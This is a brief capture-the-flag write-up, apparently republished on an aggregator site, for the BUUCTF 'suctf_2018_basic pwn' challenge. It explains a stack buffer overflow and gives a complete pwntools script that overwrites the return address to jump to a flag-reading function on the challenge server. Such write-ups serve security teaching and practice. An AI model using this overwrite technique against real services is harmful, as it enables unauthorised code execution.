[BUUCTF]PWN——suctf_2018_basic pwn

Others 2021-03-23 10:46:30 views: null

suctf_2018_basic pwn

annex

step

  1. Routine inspection, 64-bit program, open RELRO and NX
    Insert picture description here
  2. Try running the program to see the general situation
    Insert picture description here
  3. 64-bit ida was loaded, and the function to read the flag was found when searching the string, flag_addr=0x401157
    Insert picture description here
    main()
    Insert picture description here
    s overflowed, simply overwrite the return address to the problem of the backdoor function type

Full exp

from pwn import *

r=remote('node3.buuoj.cn',25779)
flag_addr=0x401157

payload='a'*(0x110+8)+p64(flag_addr)

r.sendline(payload)

r.interactive()

Insert picture description here

Guess you like

Origin blog.csdn.net/mcmuyanga/article/details/113543146
pwn
Recommended
Ranking
ElasticSearch-- data modeling best practices
Permission Maintenance - Shadow User Backdoor
Refactor the code using MVP mode
Quantitative investment-fundamental model-PVC multi-factor model
Spark Big Data Processing Lecture Notes 3.2 Mastering RDD Operators
Blazor page components (2)
Erlernen von Kenntnissen zur Android-Entwicklung – Kodierung, Verschlüsselung, Hash, Serialisierung und Zeichensätze
About Qi high in JAVA study notes SORM summary detailed personal explanation
Will you calculate the accuracy of the rope displacement sensor in the measurement?
OPENJTAG debugging learning (3): debugging using the gdb command line
Daily
More
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)

Code World

© 2018 codetd.com